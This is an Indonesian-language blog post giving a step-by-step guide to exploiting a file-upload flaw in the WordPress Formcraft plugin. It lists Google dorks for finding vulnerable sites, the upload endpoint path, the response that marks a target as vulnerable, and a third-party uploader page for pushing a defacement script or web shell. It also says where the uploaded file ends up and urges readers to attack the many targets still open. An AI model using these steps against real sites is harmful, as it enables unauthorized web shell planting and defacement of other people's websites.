a-ads

Kamis, 20 April 2017

Unknown

Wordpress Formcraft Plugin File Upload Vulnerability



Langsung Aja Yo

Google Dork: intext:"powered by formcraft", inurl:plugins/formcraft
                     inurl:wp-content/plugins/formcraft
                    
intext:"powered by formcraft"

Exploit : [SITE]/wp-content/plugins/formcraft/file-upload/server/content/upload.php

Tulis Dork nya Di Google Terus Cari Targetnya
Cari Targetnya dulu ya bosss
Kalo Dah Ketemu Silahkan Di Exploit

Terus Gimana Ciri2 Vuln Pas Di Exploit ???



Kalo Vuln Biasanya Ada Tulisan


{"failed":"No file found 2"}

Sini CSRF Exploiter nya : http://www.makarizo.com/coco.php
URL Nya Tulis Target mu
Post File nya Tulis files[]
Terus Kunci Target





Terus Klik Broswe Pilih SC DEFACE MU ATAU SHELL MU



Kalo Sukses Ada Tulisanya Kek Gini




Akses File Nya : target.com/wp-content/plugins/formcraft/file-upload/server/content/files/RandomAngKa

Masih Banyak Yg Freshh Monggo Di Sikat

Unknown

About Unknown -

Author Description here.. Nulla sagittis convallis. Curabitur consequat. Quisque metus enim, venenatis fermentum, mollis in, porta et, nibh. Duis vulputate elit in elit. Mauris dictum libero id justo.

Subscribe to this Blog via Email :